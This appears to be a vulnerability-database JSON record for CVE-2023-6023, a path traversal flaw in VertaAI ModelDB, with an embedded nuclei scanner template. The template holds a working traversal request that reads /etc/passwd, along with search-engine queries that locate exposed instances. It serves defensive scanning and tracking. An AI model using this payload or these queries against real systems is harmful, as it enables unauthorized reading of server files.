{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-6023/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-6023/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-6023/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-6023/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-6023/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-6023"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-6023"
    }
  },
  "enrichments": {
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2023/CVE-2023-6023.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2023-6023\n\ninfo:\n  name: VertaAI ModelDB - Path Traversal\n  author: m0ck3d,cookiehanhoan\n  severity: high\n  description: |\n    The endpoint \"/api/v1/artifact/getArtifact?artifact_path=\" is vulnerable to path traversal. The main cause of this vulnerability is due to the lack of validation and sanitization of the artifact_path parameter.\n  impact: |\n    Attackers can potentially exploit this vulnerability to perform a relative path traversal attack, which can lead to unauthorized access to sensitive local files on the server. As an impact it is known to affect confidentiality.\n  remediation: Restrict access to the web application\n  reference:\n    - https://huntr.com/bounties/644ab868-db6d-4685-ab35-1a897632d2ca/\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-6023\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2023-6023\n    cwe-id: CWE-22,CWE-29\n    epss-score: 0.02975\n    epss-percentile: 0.86694\n    cpe: cpe:2.3:a:vertaai:modeldb:-:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: vertaai\n    product: modeldb\n    shodan-query:\n      - http.favicon.hash:-2097033750\n      - http.title:\"verta ai\"\n    fofa-query:\n      - icon_hash=-2097033750\n      - title=\"verta ai\"\n    google-query: intitle:\"verta ai\"\n    zoomeye-query: title=\"Verta AI\"\n  tags: cve,cve2023,lfi,modeldb,vertaai,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/v1/artifact/getArtifact?artifact_path=../../../../../etc/passwd\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: word\n        part: header\n        words:\n          - \"application/octet-stream\"\n          - \"filename=\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022063f7e83ec26f520d1a7e66f45f6550919d67fb9e125ecc1070ea98baea02c477022100a507fa4a1d9afe58b035358421782ddb4e6aad83ba48e5b897eeaf08352f3dcd:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2023-6023"
}